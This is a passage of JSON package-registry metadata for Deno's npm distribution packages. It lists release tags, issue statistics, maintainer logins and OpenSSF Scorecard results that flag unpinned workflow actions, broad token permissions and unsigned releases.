.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2/manifests"},{"name":"v0.0.1","sha":"67d89ff692a88ae42145043eac1a5c58413ae110","kind":"commit","published_at":"2018-08-17T16:58:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1/manifests"}]},"repo_metadata_updated_at":"2026-09-08T19:45:04.305Z","dependent_packages_count":0,"downloads":73341,"downloads_period":"last-month","dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":25.354594294144324,"dependent_packages_count":36.69686831981711,"stargazers_count":0.04074647542987531,"forks_count":0.37016605755909804,"docker_downloads_count":null,"average":15.615593786737602},"purl":"pkg:npm/%40deno/linux-arm64-glibc","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/npm/@deno/linux-arm64-glibc","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/npm/@deno/linux-arm64-glibc","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/npm/@deno/linux-arm64-glibc/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-09-08T15:20:51.828Z","issues_count":6662,"pull_requests_count":9678,"avg_time_to_close_issue":17121605.73139413,"avg_time_to_close_pull_request":1530875.9301115242,"issues_closed_count":3814,"pull_requests_closed_count":8069,"pull_request_authors_count":594,"issue_authors_count":2496,"avg_comments_per_issue":2.5022515761032724,"avg_comments_per_pull_request":0.7209134118619549,"merged_pull_requests_count":7045,"bot_issues_count":0,"bot_pull_requests_count":48,"past_year_issues_count":682,"past_year_pull_requests_count":1198,"past_year_avg_time_to_close_issue":1327952.9787234042,"past_year_avg_time_to_close_pull_request":1317968.8908554572,"past_year_issues_closed_count":235,"past_year_pull_requests_closed_count":678,"past_year_pull_request_authors_count":194,"past_year_issue_authors_count":379,"past_year_avg_comments_per_issue":1.2272727272727273,"past_year_avg_comments_per_pull_request":1.1327212020033388,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":2,"past_year_merged_pull_requests_count":509,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/issues","maintainers":[{"login":"bartlomieju","count":1808,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"dsherret","count":1731,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"littledivy","count":925,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"nathanwhit","count":674,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"kt3k","count":443,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"},{"login":"nayeemrmn","count":374,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nayeemrmn"},{"login":"lucacasonato","count":353,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"mmastrac","count":314,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mmastrac"},{"login":"denobot","count":290,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"crowlKats","count":285,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"iuioiua","count":268,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/iuioiua"},{"login":"devsnek","count":164,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"satyarohith","count":149,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/satyarohith"},{"login":"ry","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"magurotuna","count":65,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"losfair","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/losfair"},{"login":"piscisaureus","count":22,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"aapoalas","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aapoalas"},{"login":"philhawksworth","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/philhawksworth"},{"login":"arnauorriols","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arnauorriols"},{"login":"lucab","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucab"},{"login":"qti3e","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/qti3e"},{"login":"ashleysyg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashleysyg"},{"login":"Elizarspbspb","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Elizarspbspb"},{"login":"RomanDavlyatshin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/RomanDavlyatshin"},{"login":"aryyawijaya","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aryyawijaya"},{"login":"leandrohstein","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/leandrohstein"},{"login":"Mohsen-mhm","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mohsen-mhm"}],"active_maintainers":[{"login":"bartlomieju","count":401,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"nathanwhit","count":183,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"crowlKats","count":35,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"littledivy","count":35,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"dsherret","count":22,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"denobot","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"devsnek","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"magurotuna","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"piscisaureus","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"lucacasonato","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"ry","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"kt3k","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@deno%2Flinux-arm64-glibc/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@deno%2Flinux-arm64-glibc/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@deno%2Flinux-arm64-glibc/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@deno%2Flinux-arm64-glibc/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@deno%2Flinux-arm64-glibc/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@deno%2Flinux-arm64-glibc/codemeta","maintainers":[{"uuid":"ry","login":"ry","name":null,"email":"ry@tinyclouds.org","url":null,"packages_count":44,"html_url":"https://www.npmjs.com/~ry","role":null,"created_at":"2024-12-12T21:50:15.048Z","updated_at":"2024-12-12T21:50:15.048Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/ry/packages"},{"uuid":"divy-work","login":"divy-work","name":null,"email":"dj.srivastava23@gmail.com","url":null,"packages_count":45,"html_url":"https://www.npmjs.com/~divy-work","role":null,"created_at":"2024-12-12T21:50:16.425Z","updated_at":"2024-12-12T21:50:16.425Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/divy-work/packages"},{"uuid":"denobot","login":"denobot","name":null,"email":"denobot@deno.com","url":null,"packages_count":28,"html_url":"https://www.npmjs.com/~denobot","role":null,"created_at":"2024-12-12T21:50:17.165Z","updated_at":"2024-12-12T21:50:17.165Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/denobot/packages"},{"uuid":"bartlomieju","login":"bartlomieju","name":null,"email":"biwanczuk@gmail.com","url":null,"packages_count":26,"html_url":"https://www.npmjs.com/~bartlomieju","role":null,"created_at":"2026-03-27T13:03:31.364Z","updated_at":"2026-03-27T13:03:31.364Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/bartlomieju/packages"}],"registry":{"name":"npmjs.org","url":"https://registry.npmjs.org","ecosystem":"npm","default":true,"packages_count":5836603,"maintainers_count":1249644,"namespaces_count":427708,"keywords_count":891347,"github":"npm","metadata":{"funded_packages_count":192785,"rate_limit":2},"icon_url":"https://github.com/npm.png","created_at":"2022-04-04T15:19:23.081Z","updated_at":"2026-09-04T05:03:39.333Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/namespaces"}},{"id":11161839,"name":"@deno/darwin-x64","ecosystem":"npm","description":"darwin-x64 distribution of Deno","homepage":"https://deno.land","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/denoland/deno","keywords_array":[],"namespace":"deno","versions_count":96,"first_release_published_at":"2024-12-12T21:24:31.244Z","latest_release_published_at":"2026-08-27T17:35:53.950Z","latest_release_number":"2.9.6","last_synced_at":"2026-09-07T22:55:54.461Z","created_at":"2024-12-12T21:25:11.582Z","updated_at":"2026-09-07T22:55:54.461Z","registry_url":"https://www.npmjs.com/package/@deno/darwin-x64","install_command":"npm install @deno/darwin-x64","documentation_url":null,"metadata":{"funding":null,"dist-tags":{"lts":"2.2.15","latest":"2.9.6"},"contentPolicy":null},"repo_metadata":{"id":37251508,"uuid":"133442384","full_name":"denoland/deno","owner":"denoland","description":"A modern runtime for JavaScript and TypeScript.","archived":false,"fork":false,"pushed_at":"2026-08-22T12:52:12.000Z","size":247311,"stargazers_count":108275,"open_issues_count":1528,"forks_count":6351,"subscribers_count":1426,"default_branch":"main","last_synced_at":"2026-08-22T15:40:08.889Z","etag":null,"topics":["deno","javascript","rust","typescript"],"latest_commit_sha":null,"homepage":"https://deno.com","language":"Rust","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/denoland.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":".github/CONTRIBUTING.md","funding":null,"license":"LICENSE.md","code_of_conduct":".github/CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":".github/SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":".github/copilot-instructions.md","dco":null,"cla":null,"disclosure":null}},"created_at":"2018-05-15T01:34:26.000Z","updated_at":"2026-08-22T14:38:59.000Z","dependencies_parsed_at":"2026-08-08T17:34:36.142Z","dependency_job_id":null,"html_url":"https://github.com/denoland/deno","commit_stats":{"total_commits":12946,"total_committers":999,"mean_commits":12.95895895895896,"dds":0.8464390545342191,"last_synced_commit":"9ad0d4c3db85ce9f8007dc088d164bcc7f544708"},"previous_names":[],"tags_count":440,"template":false,"template_full_name":null,"purl":"pkg:github/denoland/deno","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","download_url":"https://codeload.github.com/denoland/deno/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/sbom","scorecard":{"id":334411,"data":{"date":"2025-08-11","repo":{"name":"github.com/denoland/deno","commit":"228574b04210ad54baf04126810e2c113a462bcc"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.6,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 14 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: .github/SECURITY.md:1","Info: Found linked content: .github/SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: .github/SECURITY.md:1","Info: Found text in security policy: .github/SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/promote_to_release.yml:24","Warn: no topLevel permission defined: .github/workflows/cargo_publish.yml:1","Warn: topLevel 'contents' permission set to 'write': .github/workflows/ci.yml:5","Warn: no topLevel permission defined: .github/workflows/node_compat_test.yml:1","Warn: no topLevel permission defined: .github/workflows/post_publish.yml:1","Warn: no topLevel permission defined: .github/workflows/pr.yml:1","Warn: no topLevel permission defined: .github/workflows/promote_to_release.yml:1","Warn: no topLevel permission defined: .github/workflows/start_release.yml:1","Warn: no topLevel permission defined: .github/workflows/version_bump.yml:1","Warn: no topLevel permission defined: .github/workflows/wpt_epoch.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.md:0","Info: FSF or OSI recognized license: MIT License: LICENSE.md:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Binary-Artifacts","score":5,"reason":"binaries present in source code","details":["Warn: binary detected: tests/specs/npm/pkg_index_ts_and_js/node_modules/package/wasm/index.wasm:1","Warn: binary detected: tests/specs/run/error_bad_wasm_import/toolkit.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/cjs_importing/math.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/table_global_memory/mod.wasm:1","Warn: binary detected: tests/specs/run/wasm_unreachable/unreachable.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Branch-Protection","score":8,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'force pushes' disabled on branch 'main'","Warn: required approving review count is 1 on branch 'main'","Warn: codeowners review is not required on branch 'main'","Info: status check found to merge onto on branch 'main'","Info: PRs are required in order to make changes on branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":0,"reason":"Project has not signed or included provenance with any releases.","details":["Warn: release artifact v2.4.4 not signed: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 not signed: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 not signed: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 not signed: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 not signed: https://api.github.com/repos/denoland/deno/releases/230701638","Warn: release artifact v2.4.4 does not have provenance: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 does not have provenance: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 does not have provenance: https://api.github.com/repos/denoland/deno/releases/230701638"],"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/npm_publish.yml:16"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:790: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:795: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:822: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:829: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:153: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:182: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:194: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:198: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:202: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:216: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:226: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:240: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:251: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:384: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:401: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:462: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:509: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:522: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:731: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:766: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:22: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:26: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:41: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:63: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:67: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:74: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/post_publish.yml:14: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/pr.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/pr.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:65: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:73: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:104: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:119: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:125: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:133: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:138: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:155: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/start_release.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/start_release.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/version_bump.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:40: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:43: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: 